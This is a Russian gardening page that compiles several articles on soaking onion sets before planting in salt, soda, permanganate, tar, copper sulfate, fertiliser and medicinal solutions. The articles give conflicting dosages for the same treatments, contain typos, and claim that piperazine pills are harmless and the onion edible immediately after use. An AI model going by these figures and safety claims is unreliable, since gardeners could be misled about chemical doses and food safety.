0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

В чем лучше замачивать лук севок перед посадкой весной

Обработка лука перед посадкой: в чем замочить лук севок

Есть мнение, что обработка лука перед посадкой весной или осенью положительно влияет на урожайность. Более того, она препятствует появлению стрел. И не дает развиваться болезням. Хорошо со всех сторон, не так ли? Однако, многие огородники не замачивают лук-севок и получают отличный урожай. Другие, наоборот, проводят предпосевную подготовку по всем правилам, но остаются недовольны результатом.

Зачем обрабатывать лук перед посадкой? В каких случаях эта процедура нужна, а когда она лишняя? В чем замачивают лук-севок? Вот основные вопросы, в которых нам предстоит разобраться.

Когда обработка лука-севка не помешает


Итак, для чего замачивают лук перед высадкой в грядку? В первую очередь, для его прогревания. Дело в том, что крупный и средний севок предпочтительно хранить при теплой температуре (22-25°С). Мелкий лучок (до одного сантиметра в диаметре) лучше всего сохраняется при 2-8 градусах тепла. Если посевной материал хранится в неподходящих для него условиях, он портится. Испорченный севок выдаст стрелку, и хорошей луковицы из него не вырастет.

Когда мы сами выращиваем лук-севок из семян и храним его в погребе или в квартире, мы знаем о нем все. В какую погоду его убирали, как сушили и при какой температуре хранили… Если лучок хранился в погребе, перед посадкой достаточно три недели выдержать его в сухости и тепле, то есть при комнатной температуре. И он готов к высадке!

А вот о покупном луке нам ничего не известно. При какой влажности и температуре его хранили – загадка без отгадки. Такой посевной материал нуждается в дополнительной обработке, чтобы уменьшить процент “ушедших в цвет”.

Кроме того, семенные луковки можно обрабатывать с целью обеззараживания. Профилактика – дело нужное. Так что замачивание в антисептическом растворе не повредит ни крупным луковицам, ни мелким, ни своим, ни магазинным.

Вывод очевиден. Если мы уверены, что лук хранился как положено, можно обойтись без подготовки или провести только дезинфекцию. Но если севок покупной, лучше перестраховаться и обработать его “по полной программе”.

В чем замочить лук от стрелкования и для увеличения урожая


В идеале можно вообще обойтись без замачивания, если вовремя вспомнить о подготовке лука. Прогреть севок вполне реально и у батареи, вот только на это требуется время. Есть в запасе две недели до высадки? Здорово! Тогда держим луковички у радиатора (при температуре 30-35°С):
  • мелкий севок – примерно 8-10 дней;
  • средний и крупный – около 12-15 дней.

Когда время поджимает, когда лук-севок куплен непосредственно перед посадкой или батареи в доме недостаточно горячи, воспользуемся быстрыми способами прогреть наши луковицы. Тут придется замачивать!

Горячая вода

Самый популярный, безвредный и дешевый вариант – замачивание луковиц в обыкновенной воде. Единственное условие – она должна быть горячей. Чтобы прогреть севок, прямо в день посадки опускаем его на 10 минут в воду 45-50°С. Затем подсушиваем пару-тройку часов на солнце и сажаем.

Замачивание лука в соде тоже нередко практикуется среди огородников, хотя однозначного мнения насчет пользы соды нет. Возможно, все дело в том, что раствор соды – это щелочь, а лук как раз предпочитает щелочную среду. К тому же сода отлично дезинфицирует посевной материал, и это тоже аргумент в ее защиту. В общем, для предпосевной обработки лука содой нам понадобится растворить чайную ложку соды в литре горячей воды (все те же 45-50°С). Погружаем севок в раствор, укутываем емкость в толстое одеяло и оставляем на полчаса.

Один из самых эффективных помощников любого дачника – зола – вполне подойдет и для подготовки лука к посадке. На 5 литров воды берем 250 грамм золы, настаиваем ее около часа. Потом выдерживаем в зольном настое лук в течение семи минут. Просушиваем на солнышке и сажаем.

Стимуляторы роста

Обработка лука стимулирующими препаратами (Эпин Экстра, Энерген, Гумат +7, Биостим, Циркон и др.) имеет свои плюсы. Это и улучшение всхожести, и быстрое наращивание корней, и укрепление сопротивляемости неблагоприятным условиям. Наша задача – растворить препарат в воде строго по инструкции и погрузить в раствор лук на 10-15 минут.

Обработка посевного лука от болезней и вредителей

Выдержанный в солевом растворе лук очень не нравится луковой мухе и нематодам. У кого есть проблемы с этими вредителями, берите на заметку:

  • на два часа помещаем севок в обычную воду комнатной температуры;
  • в 10 литрах теплой воды растворяем 6 столовых ложек соли;
  • на 3-4 часа оставляем лучок в соленой воде;
  • промываем лук от соли в нескольких водах;
  • слегка подсушиваем и сажаем.

Марганцовка

В марганцовке протравливают все и вся, семенной лук – не исключение. Для получения раствора необходимо 10 грамм перманганата калия на 10 литров воды. После 20-25 минут проведенных в марганцовке лук-севок слегка ополаскивают водой – и он готов к высадке.

Фитоспорин

С грибковыми заболеваниями отлично справляется биопрепарат Фитоспорин. Огородники любят его за безопасность и доступность. Фитоспорин разводим по инструкции: 1 столовая ложка на 10 литров воды. Выдерживаем лук-севок в полученном растворе около 2 часов. Затем немного просушиваем и высаживаем в грядку.

Березовый деготь

Березовый деготь – хороший антисептик для борьбы с патогенными микроорганизмами. Помимо этого его едкий запах отпугивает луковою муху. Работает по двум фронтам! Процедуру обработки дегтем проводят в два этапа:

  • Сначала 24 часа выдерживают севок на батарее (38-40°С),
  • А потом на 2-4 часа замачивают лук в растворе березового дегтя. Для его приготовления столовую ложку дегтя тщательно смешивают с литром воды комнатной температуры.

Аммиачная селитра

Замачивание лука в аммиачной селитре тоже убивает двух зайцев. С одной стороны, селитра пагубно влияет на возбудителей болезней лука. С другой стороны, насыщает луковицы минеральными веществами. Своего рода подкормка, так ведь? Нам потребуется 20-30 грамм удобрения на 10 литров горячей воды (40°С). Лук-севок опускаем в раствор на 15-20 минут.

Медный купорос

В целях дезинфекции можно применять и медный купорос – знаменитый противогрибковый химикат. Растворяем 30 грамм синего порошка в 10 литрах воды. Выдерживаем лук в растворе 10 минут, промываем чистой водой и на грядку.

Теперь нам известно, что обработка посевных луковиц включает в себя две процедуры: прогревание и дезинфекцию. Кстати, их можно совмещать. Например, сначала неделю прогревать лук при температуре 24-25°С. Затем на три часа поместить в соленую воду, после чего промыть, просушить и сажать.

Хотите еще информации о выращивании лука? Она есть.

Желаем вам успехов и больших урожаев!

Автор статьи: Дудко С.Г. Статья защищена законом об авторском праве. Ее перепечатка и копирование без согласия автора — нарушение закона. © Dachnye-sovety.ru

Оцените, пожалуйста, статью. Мы очень старались:

ПОДЕЛИТЕСЬ С ДРУЗЬЯМИ ДАЧНЫМИ СОВЕТАМИ И ОГОРОДНЫМИ ХИТРОСТЯМИ:

В чем лучше замачивать лук севок перед посадкой весной

Опытные садоводы за время работы на участке накапливают бесценную информацию касательно выращивания той или иной культуры. Простые советы помогают улучшить урожайность, получить качественный по вкусу и товарному виду плод. Для многих вопрос подготовки лука к посадке вообще не вызывает никаких ассоциаций. И только знатные огородники понимают, что речь идёт о том, что его нужно замочить.

Сколько же способов обработать овощ весной существует? Мы рассмотрим самые основные — что делать чтобы быстрее появились всходы, зачем и на сколько вообще выполняется процедура, как обрабатывать и полить семена чтобы уберечь от червей мухи, и нужно ли делать обработку такими средствами как Фитоспорин перед посевом.

Нужно ли замачивать лук перед посадкой весной?

Замачивание не является обязательной процедурой перед высадкой луковичных культур, особенно если лук выращивается в промышленных масштабах.

Загружать себя не стоит подготовкой севка и в случаях использования качественного посадочного материала, который произрастал на здоровой почве и хранился в надлежащих условиях.

Так как севок преимущественно приобретается на оптовых рынках, гарантировать наличие у него здоровой микрофлоры никто не может. Поэтому правильная процедура замочки семян помогает обезопасить огородников от неприятных сюрпризов. Это и потеря урожайности, и загнивание лука, и заражение грунта разными болезнями и вредителями.

Перед замачиванием необходимо надрезать лук, чтобы дать раствору проникнуть между чешуйками и убить болезнетворные микроорганизмы. Но увлекаться обрезанием не стоит, сделав слишком большой срез, репка может загнить или не выпустить перо, также можно чистить семена от старой шелухи.

При использовании посадочного материала маленьких размеров проводить обработку слишком трудоёмко, поэтому лучше обезопасить свой будущий урожай на этапе закупок.

Если приобретаются мелкие семена — их нужно отобрать на этапе закупок без обработки

Отдавать предпочтение стоит фермерским хозяйствам, которые придерживаются технологии выращивания, производят сбор урожая в сухую погоду, имеют специальные хранилища. Это исключает порчу или снижение свойств лука в зимний период.

Плюсы и минусы замачивания севка

Среди дачников не утихает спор по поводу эффективности подготовки лука к высадке с помощью замачивания. Принимать решение для себя должен каждый, а основываться можно на преимущества и недостатки данной процедуры.

Согласно анализу многолетнего опыта садоводов, отмечаются следующие плюсы процедуры:

  • активизация процесса роста зелени и репки;
  • обеззараживание;
  • предупреждения гниения;
  • защита почвы от болезнетворных бактерий, которые могут переноситься с посадочным севком.

Обработка лука активирует рост зелени и репки

Недостатки замачивания касаются неправильной подготовки или нарушения температурного режима. Посадочный материал может испортиться из-за неправильной обрезки или несоблюдения пропорций при изготовлении раствора. Поэтому перед использованием одного из вариантов, следует изучить инструкцию.

Как и в чем замочить лук перед посадкой

В зависимости от используемого раствора меняется цель обработки, некоторые процедуры многофункциональны. Каждый способ обладает своими преимуществами и особенностями.

Как обработать в солевом растворе

Солевые ванны используют чаще в сочетании с другими процедурами. Самый простой и популярный способ подготовки севка к посадке предусматривает 2 этапа обработок: с помощью солевого раствора и марганцовки.

Сначала лук замачивается на 3 часа в соляной ванне, которая готовится в таких пропорциях: в 2 литрах воды размешиваются 2 столовые ложки обычной каменной (столовой) соли.

Замачивание в солевом растворе обеспечивает быстрый рост

Такая процедура обеспечивает быстрый рост растения, развитие репки, защищает от агрессивной почвенной среды. Соль дезинфицирует лук от нематоды и других возбудителей.

В марганцовке

В ведре с водой нужно развести всего 30-35 г перманганата калия, тщательно перемешать его до полного растворения кристалликов. После этого в ёмкость погрузить посевной материал и дать ему отстояться пару часов.

Этот способ эффективен благодаря действию марганцовки, которая справляется со многими болезнетворными бактериями.

Содовый раствор

Пищевой соде приписывают много качеств, которыми она не обладает. Так, к примеру, бытует мнение, что содовые ванны помогаю предотвратить стрелкование лука при созревании. Это не соответствует действительности, ведь выброс стрелки в основном зависит от условий сохранения лука в зимний период. Сода повлиять на этот процесс и защитить никак не сможет и он будет стрелковаться после обработки.

А вот при термической обработке её можно использовать. Для этого севок перед самой высадкой в огород следует замачивать в горячей воде (не более 45-50 градусов) с добавлением небольшого количества соды (на 10 л чайная ложка). Данная процедура, продолжительностью 10-15 минут, обеспечивает обеззараживание посадочного материала.

Как сделать обработку березовым дегтем

Для обработки севка перед высадкой применяют специальные препараты широкого действия. Альтернативой является природный материал – берёзовый дёготь. Он прекрасно справляется с разными вредителями и болезнетворными бактериями, в частности с луковой мухой.

Использование берёзового продукта считается экологичным и безопасным для здоровья людей и микрофлоры почвы.

Подготовка лука с помощью дёгтя состоит из следующих этапов:

  • подсушка севка на батарее в течение суток (температурный режим 37-40 градусов);
  • снятие верхней шелухи с каждой репки;
  • обрезка верхушек;
  • замачивание в растворе на протяжении 2-4 часов.

Раствор готовится в пропорциях: на 1 литр воды берётся 1 столовая ложка дёгтя. Температура жидкости должна быть в пределах 18-22 градусов. Во времени процедуры потребуется 2-3 раза перемешивать содержимое ёмкости для лучшей пропитки посевного материала.

Чтобы севок не всплывал во время процедуры замачивания, рекомендуется погружать его в сетке и выкладывать сверху кирпич либо другой утяжелитель. Но слишком тяжёлые предметы использовать не стоит, они могут раздавить луковки.

Чтобы севок не всплывал при замачивании, следует использовать утяжелитель

Какую обработку делать чтобы защитить от вредителей

Самую большую угрозу репчатому луку представляет луковая муха. Личинки, червяки, отложенные поблизости растений, могут погубить весь урожай. Избежать таких неприятностей поможет обработка посадочного материала перед посевными работами.

Также овощ может поражаться такими вредителями как медведка, проволочник, колорадский жук.

Самый простой и верный способ предусматривает замачивание севка перед посадкой в дегтярном растворе. Также можно выбрать двух этапную обработку солевым и марганцовым составом.

Среди народных средств хорошо зарекомендовали себя ванны с применением красного перца и жидкого хозяйственного мыла. Пропорции: ведро воды, столовая ложка жидкого мыла, 30 гр. сухого красного перца. Длительность процедуры – 1-2 часа.

Самый опасный вредитель — луковая муха

Избавиться от вредителей и болезней поможет полив специально приготовленными растворами. Среди эффективных способов:

  • солевая жидкость (10 л воды + 3 ст. л.);
  • табачная смесь (3 л горячей воды + 200 гр. табачной пыли), выстаивается 2 суток;
  • настой на одуванчиках (10 л кипятка + 200 гр. измельчённых листьев), настаивать 3-4 дня;
  • нашатырный спирт (2 ст. л.) с водой (10 л).

Опрыскивать почву нужно аккуратно, чтоб не навредить растению. Проводить обработку следует 1-2 раза в неделю. Если способы оказались бессильными, рекомендуется прибегнуть к применению специальных препаратов, например Фитоспорина.

В целях профилактики от повреждения растения от нашествия вредителей рекомендуется придерживаться следующих советов:

  • перед посадкой почву нужно обогатить перегнившим навозом или торфом;
  • для высадки не использовать испорченные и поражённые репки;
  • ежегодно следует менять место высадки;
  • грядки лука формировать в непосредственной близости с пряными и сильно ароматными травами, морковью;
  • после сбора урожая необходимо глубоко перекопать грунт.

Какой бы способ обработки перед высадкой не был выбран, не стоит забывать о должном уходе, от которого также зависит урожайность и качество лука. Замачивание представляет всего лишь вспомогательный метод, способствующий быстрому росту и обеззараживанию. Без своевременного орошения и введения прикорма хорошего урожая не будет.

В чем вымачивать лук перед посадкой

Если знать тонкости культивации, то выращивание овощей станет намного проще. Многие огородники сталкиваются с проблемой и не знают, в чем вымачивать лук перед посадочными работами. В нашем обзоре расскажем, зачем нужна эта процедура и какие эффективные способы существуют.

Нужно ли замачивать лук перед посадкой

Особенности культивации

Обильный урожай на собственном участке — это заслуга внимательного агрария. Новички часто сталкиваются с тем, что молодняк уничтожают вредители, болезни, порой растения полностью не раскрывают свой потенциал. Нужно ли замачивать лук перед посадкой?

Светолюбивая культура имеет определенные требования к произрастанию. Недостаток солнечного света негативно отражается на общем состоянии и может спровоцировать активизацию грибков. Неправильный поливочный режим тоже способствует тому, что луковичка теряет защитные свойства иммунитета. Избыток влаги или регулярная жажда в период формирования корней и зеленной массы отразится на урожайности.

Грибковые заболевания и инфекции являются бичом овощей. Без предварительной обработки семена подвергаются агрессивной атаке со стороны недугов. Дополнительно насекомые с удовольствием полакомятся сочными луковицами.

Игнорирование правил севооборота тоже негативно отразится на общем здоровье растений. Опытные аграрии не рекомендуют высаживать культуру несколько лет подряд на одном месте, а также после моркови, чеснока или огурцов. Лучшими предшественниками считают:

  • сидераты (рапс, клевер, люпин, горчица);
  • бобовые;
  • томаты;
  • капуста.

Растение не любит кислые почвы, поэтому грунт необходимо предварительно ощелачивать. Грядки для луковиц готовят с осени. Тщательно перекапывают землю, выбирая растительные остатки. На зиму добавляют органические удобрения, а весной вносят минеральную подкормку. Если на участке болели овощи, тогда лучше протравить место медным купоросом.

Все вышеперечисленные факторы могут негативно повлиять на урожайность. Чтобы снизить финансовые и физические затраты, аграрии используют менее хлопотный способ — замачивание лука перед посевом. Весенние работы не займут столько времени, как удаление последствий ошибок.

Сортировка материала

Перед посадкой севок обязательно нужно перебрать. Мягкие испорченные головки не дадут урожай, а станут источником инфекции на грядке. То же самое касается полностью высохших репок. Огородники без сожалений выбрасывают отбраковку.

Овощи, которые не пустили листиков, рекомендуют слегка подстричь. Процедура будит «соню» и ускоряет прорастание. Для этого у луковиц срезают чешуйки, убирают корешки и шейку.

В течение трех недель сырье прогревают при температуре не ниже 20°С. Для этого материал раскладывают на полу, недалеко от отопительных приборов, потом показатели увеличивают до 40°М. Важно не передержать семена, иначе урожай погибнет.

Нет времени для длительной процедуры? Огородники рекомендуют экспресс-метод. В течение 10 минут репки держат в теплой воде (до 50°С), потом переносят в холодную жидкость. Завершительным этапом станет ванна из раствора для удобрений.

Солью

В чем замочить лук перед посадкой? Несмотря на наличие огромного количества современных препаратов, аграрии выбирают старые проверенные способы. В солевом растворе содержатся вещества, которые не любят круглые черви и грибковые заболевания. Средством обрабатывают как посевной материал, так и грядку перед высадкой.

Для приготовления растворяют 25 г сырья в 2-х л теплой воды. Важно, чтобы не осталось комков и осадка, поэтому тщательно перемешивают деревянной палочкой. Можно заранее развести препарат в жидкости, а уже потом разбавить в основной.

Лучше всего взять большое сито, или сетку. Можно найти альтернативу вроде бумажного пакета или авоськи. Главное, — чтобы репки оставались внутри, а жидкость могла к ним попасть снаружи.

Замачивание лука перед посадкой в солевом растворе проходит в течение 3-х или 4-х часов. Чтобы облегчить процедуру, опытные аграрии собирают севок в женские чулки. После обработки «мешки» достают и раскладывают репки для просушки. Через 2-3 дня можно приступать к работам.

Марганцем

Как правильно замачивают лук перед посадкой? Безопасные домашние препараты не всегда являются эффективными, поэтому огородники совмещают несколько методов. Дополнительная процедура позволит продезинфицировать посевной материал от инфекций, грибков и паразитов. А низкая стоимость сырья дает возможность сэкономить семейный бюджет.

Как и соленая вода, раствор марганцовки используется за пару дней перед аграрными работами. Замачивают лук-севок перед посадкой в правильно приготовленной жидкости. Для этого берут 35 граммов кристаллов и разводят в десяти литрах теплой влаги. Тщательно перемешивают палочкой, чтобы растворить остатки вещества.

Отсортированные сеянцы помещают в чулок, а потом аккуратно погружают в емкость с веществом. По истечении указанного времени, материал достают, просушивают. Через два дня можно приступать к посадке семян.

Содой

Некоторые огородники советуют замочить лук-севок перед посадкой бикарбонатом натрия. Опытные аграрии редко применяют данный метод. В отличие от двух перечисленных способов, этот не защищает от болезней, но является профилактикой массового образования стрелок.

Вымочить лук в теплом содовом растворе можно за пару дней до посадки. 1 ч. л. разводится в 1 л нехолодной воды. Вещество тщательно размешивают и заливают упакованные в чулки репки. Через 3 часа жидкость удаляют, а материал раскладывают сушиться.

Чтобы закрепить результат, рекомендуют замачивать лук-севок перед посадкой в марганцовке. Сильные дезинфицирующие свойства кристаллического вещества окажут дополнительную поддержку молодым растениям. Растворенная в воде сода не является панацеей, поэтому ее редко применяют.

Дегтем

Как перед посадкой замочить лук? Экологически чистой альтернативой станет березовое вещество. Оно отлично защищает репку от болезней и насекомых. Процедуру проводят после тщательной подготовки и выбраковки материала.

Столовую ложку дегтя растворяют в 1 л нехолодной воды. В этой жидкости надо подержать сырье в течение 2-х часов. За это время активное вещество проникает под чешуйки луковиц, создавая надежную пленку от грибков и мух.

Интенсивный аромат дегтя неприятен насекомым, поэтому рекомендуют весной перед высадкой поливать грядки. На стандартную лейку нужно добавить одну ложку вещества. Дождливым летом советуют проводить повторные орошения под корень и по зелени.

Купоросом

Безопасные препараты для луковиц не так эффективны, как «агрессивная химия»: они не гарантируют длительной защиты в течение нескольких недель, которые требуются для адаптации растения в открытом грунте. В этом случае применяют более радикальные методы.

Замачивание лука в медном купоросе проходит в несколько этапов. Для ускорения роста используют раствор комплексного удобрения. Чаще всего применяют одну ложечку нитрата аммония на 70 л воды. В этой емкости располагают репки на 15 минут. Потом посевной материал перекладывают в слабый раствор купороса. Вещество это очень агрессивное, поэтому необходимо взять не более 1 с. л. на ведро жидкости. Работы проводят в защитной одежде и маске. После процедуры можно приступать к посеву.

В чем замочить лук перед посадкой

Лук – это одна из самых распространенных культур. Его применяют и в пищу, и как целебное средство. Выращивают его в России с двенадцатого века. В состав лука входят большое количество витаминов, фитонциды, минеральные соли и множество других необходимых человеческому организму минеральных веществ. Благодаря этому овощ стал настолько популярным на всей планете.

Лук можно выращивать один, два, а то и три года, в зависимости от того, с какой целью его выращивают. На первый год, высевая в почву семена, огородник получает лук-севок или, как его еще называют – арбажейку. Эти луковички имеют в диаметре от одного до двух сантиметров, весом от двух до пяти грамм. На второй год при посадке лука-севка вырастает большая луковица-матка. И когда на третий год посадить большую луковицу, то в результате можно получить семена. Поскольку они имеют черный цвет, то и назвали их чернушкой.

Южные районы могут получить семена уже на второй год выращивания лука. На первый год посева здесь получают готовую луковицу-матку. А на второй год – на ней вырастает стрелка с семейным соцветием на конце, где и образуются семена.

При выращивании лука необходимо учитывать агротехнические особенности этой культуры. Нужно принять во внимание, что корневая система овоща имеет мочковатую структуру, из-за чего ей нужно дополнительное питание. Именно благодаря этому лук дает высокие урожаи. Лучше всего сажать лук на участке, где росли культуры, для которых при подготовке почвы вносили органические удобрения. К таким растениям относятся:

Лук отлично соседствует с такими культурами, как:

Благодаря этому можно делать уплотнение грядки.

Высаживать лук нужно в почву, которая дает нейтральную реакцию на кислотность. Поэтому слишком кислую почву необходимо раскислять. Для этого используют гашеную известь, доломитовую муку или древесную золу. Ни в коем случае нельзя давать под эту культуру свежие органические удобрения. Перегной должен быть зрелым. Кроме того, при подготовке участка под посадку лука осенью вносят и минеральные удобрения.

Важно. Весной перед самой посадкой также нужно подживить почву. На черноземах можно внести только органику. Торфянистую почву удобряют калийными удобрениями.

Лук отлично переносит холод и последние морозы, поэтому высаживают его, как только сойдет снег, и температура почвы достигнет +12 градусов. Во время весенних заморозков, даже при температуре -3 градуса, луковые всходы не пострадают. При этом взрослые растения при такой температуре, наоборот, перестают развиваться, и семена в таком случае не созревают полностью.

Для того чтобы лук пошел в рост и развивался, нужно достаточное количество влаги. Если семена не получат влаги, то они будут мелкими и щуплыми. В то же время большая луковица без воды остается сухой и жесткой.

Замачивание лука перед посадкой

Садоводы и огородники с каждым годом стараются узнать все больше ценной информации для того, чтобы повысить урожайность. Самые простые советы в большинстве случаев очень помогают в уходе за культурами. При выращивании лука многие совершенно не задумываются о том, как увеличить урожайность, и почему бывают случаи, когда это растение совсем не растет. Опытные огородники знают, что лук перед посадкой нужно подготовить, то есть вымочить.

Естественно сейчас встает вопрос, как замачивать лук севок перед посадкой, и сколько способов существует? Рассмотрим самые основные способы подготовки посадочного материала, чтобы улучшить всходы, как уберечь растение от вредителей и каким образом это сделать.

Стоит отметить тот факт, что вымачивать посадочный материал лука не обязательно. Тем более, если сажают его на промышленном уровне. Кроме того, обрабатывать севок не нужно в том случае, когда приобретен качественный посадочный материал. Главный критерий качества – выращивание севка на здоровом плодородном грунте.

Мало кто севок выращивает в домашних условиях, так как легче его купить на рынке. Поэтому гарантий качества в этом случае нет никаких. В этом случае замачивание арбажейки предохранит огородника от неприятностей при сборе урожая, а именно от болезней, гниения и вредителей.

Перед тем, как замачивать лук перед посадкой, каждую луковичку нужно слегка надрезать. Таким образом раствор проникнет между чешуйками и обеззаразит их от вредной микрофлоры. Но нельзя делать срез слишком большим, поскольку в этом случае луковица начнет гнить и не образует репки. Вместо среза можно просто почистить луковички от шелухи.

Если севок слишком мелкий, то это значительно утруднит процесс замачивания. По этой причине нужно при закупке выбирать проверенных поставщиков и фермеров, которые при выращивании посадочного материала добросовестно придерживаются всех технологий. При этом севок собирают в сухую теплую погоду и хранят в чистом сухом проветриваемом помещении.

Важно! Если севок высаживается только на зелень, то его обрабатывать перед посадкой не нужно.

Достоинства и недостатки замачивания лука

Дачники до сих пор ведут жаркие споры по поводу того, насколько эффективен этот процесс, и в чем замочить лук перед посадкой. Но, делать его или нет, должен решить каждый огородник индивидуально, изучив все достоинства и недостатки подобной подготовки посадочного материала.

Согласно произведенным опытам, садоводами-профессионалами был выявлен ряд достоинств замачивания лука перед посадкой. К таким относятся:

  • зелень и репка активнее растут и развиваются;
  • луковица избавляется от негативной микрофлоры, что способствует активному развитию;
  • лук не гниет;
  • почва не заражается бактериями, которые часто живут в посадочном материале.

Если рассматривать недостатки замачивания, то в этом случае можно с уверенностью сказать, что причина в этом случае в недостаточном замачивании, но никак не во вреде растворов на структуру лука. Кроме того, неправильно обрезанные луковички тоже могут вызвать негативный процесс при выращивании культуры. Поэтому, чтобы не было подобных неприятностей, перед использованием любого раствора нужно внимательно изучить инструкцию.

Растворы для замачивания

Зависимо от того, какой именно раствор будет использовать огородник, такой цели он и достигнет. Это произойдет потому, что каждый из растворов предназначается для профилактики конкретной болезни, тем более что каждый из растворов имеет свою особенность.

Важно! Прежде чем обрабатывать посадочный материал, его необходимо отсортировать и изъять мягкие и гниющие луковки.

Существуют следующие растворы для обработки лука:

  • Солевой раствор. Для его приготовления понадобятся два литра воды и две ложки поваренной соли;
  • Содовый раствор. Для его приготовления понадобятся ведро воды, температура которой не превышает пятидесяти градусов, и чайная ложка соды;
  • Марганцовый раствор. На ведро воды берут не более 35 грамм кристалликов перманганата калия;
  • Фитоспорин. Этот препарат можно купить как в виде жидкости, так и в виде пасты и порошка. Применять препарат нужно, зависимо от того, как описано в инструкции, хотя действует он одинаково;
  • Перекись водорода. Этот препарат является соединением водорода и кислорода, благодаря чему средство применяется как в медицине, так и в промышленности для окислительно-восстановительных действий;
  • Пиперазин.

Для их приготовления важна правильная дозировка, иначе процесс не принесет должного эффекта.

Процесс замачивания лука

В каждом из этих растворов замачивание делается по-разному, при этом нельзя применять их все вместе, за исключением некоторых вариантов.

Замачивание лука перед посадкой в солевом растворе можно делать с применением раствора из марганцовки. При этом первым нужно использовать соленый раствор. Лук замачивают не меньше чем на три часа. Благодаря подобному купанию, стимулируется рост репки, и растение будет защищено от агрессии среды, находящейся в почве. Таким образом, луковица не будет поражена нематодой и другими заболеваниями.

Важно! Марганцовку можно применять после солевого раствора или же в качестве индивидуального главного средства защиты.

В марганцовке лук настаивается на протяжении нескольких часов, благодаря чему можно предотвратить большое количество заболеваний, которые поражают луковицы.

По поводу содового раствора бытует большое количество легенд, одной из которых является то, что при обработке лука содовой ванной он не будет стрелковаться. Выброс стрелок луком зависит только от того, насколько правильно сохранялся луковичный посадочный материал. Если он был хорошо просушен и хранился в соответственных условиях, то стрелок не будет. В противном случае даже сода не поможет. А применение соды при обработке горячей водой предотвратит развитие некоторых заболеваний на луковицах.

В солевом растворе

Обработав лук березовым дегтем, можно избавиться не только болезней, но и от вредителей. При этом применение данного средства благоприятно влияет на человеческий организм. Обрабатывать дегтем нужно следующим образом:

  • севок тщательно просушивается на протяжении суток;
  • каждую луковичку нужно открыть, то есть снять верхнюю шелуху;
  • слегка обрезается верхушка;
  • замачивается в дегтевом растворе на протяжении трех-четырех часов.

Для приготовления раствора нужно взять ложку дегтя на литр воды. При этом вода должна быть нагрета до 22 градусов. Содержимое нужно периодически помешивать, таким образом посадочный материал хорошо пропитается.

Важно! Погружая севок в ванну, его лучше всего положить в сетку и приложить кирпичом, для того чтобы мешок не всплывал на поверхность, и лук имел возможность хорошо пропитаться.

Фитоспирин применяется только для предотвращения заболеваний, при этом он не может предотвратить нашествие насекомых на луковое растение. Кроме того, этот препарат поможет противостоять только некоторым заболеваниям, таким как:

  • мучнистая роса;
  • пероноспороз или ложная мучнистая роса;
  • бактериальная гниль лука;
  • фомоз.

При этом следует помнить, что применение препарата рекомендовано строго по инструкции. Каждый вид этого препарата имеет отдельную дозу применения. Для опрыскивания подходит раствор из порошка фитоспирина в соотношении десяти грамм на пол литра воды, а при замачивании берут двадцать грамм этого препарата. При этом фитоспирин применяют после того, как лук был замочен в растворе для стимуляции роста.

Перекись водорода действует как дезинфицирующее средство. Поэтому, обрабатывая севок этим препаратом, огородник обеззаразит растение, повысит его иммунитет, что послужит стимулятором роста. Таким образом, растение, обработанное этим препаратом, впоследствии даст хороший урожай. Лук замачивают в этом растворе не белее чем на пять минут.

Обратите вниминие. Лук часто поражается насекомыми, в частности на это растение нападает луковая муха. Большинство огородников с этой целью используют нашатырный спирт. Другие – пользуются иными методами. В частности, применяют таблетки Пипиризин. Поскольку этот препарат применяется в медицине для выведения глистов с организма человека, то применение его на грядках совершенно безвредно. Растение можно сразу после обработки принимать в пищу. Для того чтобы обработать поврежденный лук, таблетки разводят водой.

Чтобы полностью избавиться от этого вредителя осенью при подготовке почвы для высадки лука нужно глубоко перекопать участок, поскольку муха прячется в землю на глубину до двадцати сантиметров.

Важно не только то, в чем замочить лук севок перед посадкой, немаловажную роль в выращивании лука играет уход за растением. Нужно, в первую очередь, понимать, что замачивание лука севка делается только для того, чтобы помочь ему расти и развиваться. Но без удобрений он расти не будет. Для посадки нужно отобрать качественные луковички, просушить и прогреть их правильно. При этом если будет выполнены все правила посадки и ухода, то подготовка севка поможет даст ожидаемый результат, и огородник получит к своему столу крупный сочный без повреждений лук.

Замачивание лука севка перед посадкой

Замачивание посадочного материала при выращивании лука на садово-огородном участке наряду с прогревом и очисткой от лишней шелухи является одним из этапов весенней подготовки луковиц к высадке на грядку. Выбрать из многообразия растворов, в чем замачивать лук севок перед посадкой, можно исходя из личных предпочтений и удобства использования.

Применение любого из составов при правильном замачивании способно уберечь посадки от болезней и вредителей и способствует получению большого урожая высокого качества.

Для чего необходимо?

С вопросом об обязательном вымачивании лука севка перед высаживанием на грядки сталкиваются все хозяева приусадебных участков. Репчатый лук довольно неприхотлив и вырастает даже при минимальном уходе за ним.

Однако, опытные огородники знают, что предпосадочная подготовка, в том числе замачивание, для получения хорошего урожая просто необходима.

Существует 3 основных аргумента для того, чтобы замочить луковки в специально приготовленном растворе перед посадкой:

  1. Снижение вероятности стрелкования. При использовании для замачивания горячей воды посадочный материал подвергается температурному стрессу, который способствует выработке веществ, препятствующих образованию почек и стрелкованию лука. Подобным действием обладает любое прогревание луковиц.
  2. Ускорение появления всходов и созревания. Даже короткое время нахождения луковиц в воде приводит к появлению первых корешков на донце. Проросшие перед посадкой корни значительно ускоряют появление луковых перышек. Дополнительное напитывание севка водой также способствует росту урожайности. Данный фактор особенно актуален для северных районов, где короткое лето требует более раннего сбора урожая;
  3. Защита от болезней и вредителей. Выдерживание лука севка в водных растворах уничтожает личинок вредителей, способствует дезинфекции и обеззараживанию посадок. Правильно замочив луковицы весной можно не переживать о плесени и гнили, предупредить атаку на всходы луковых мух и других мелких вредителей.

Как и в чем замачивать?

К замачиванию лук севок нужно правильно подготовить. Для этого с луковки снимается лишняя шелуха, а верхушка подрезается. Обрезать лук следует очень осторожно, чтобы не повредить зачатки ростков, иначе первые перышки будут расти плохо и криво. Если севок не подрезать, то частички раствора не смогут проникнуть внутрь луковицы и дезинфекцию пройдет только корневая система.

Для приготовления раствора лучше брать теплую воду около 40 градусов. Исключение составляет раствор, получаемый из марганцовки. Крупицы марганца хорошо растворяются в холодной воде.

Для замачивания можно использовать самые разнообразные составы. Самыми известными бюджетными вариантами являются растворы соли и марганца. По своему действию они не уступают специальным препаратам. Выбирая для приготовления раствора промышленные препараты, нужно обязательно проверить сроки их годности.

Состав раствора Пропорции для разведения Срок замачивания
Горячая вода вода температуры 40-50 градусов 5 – 10 минут
Солевой раствор 20-30 грамм соли на 2 литра 3-4 часа
Содовый раствор 3 чайных ложки на 2 литр 1-2 часа
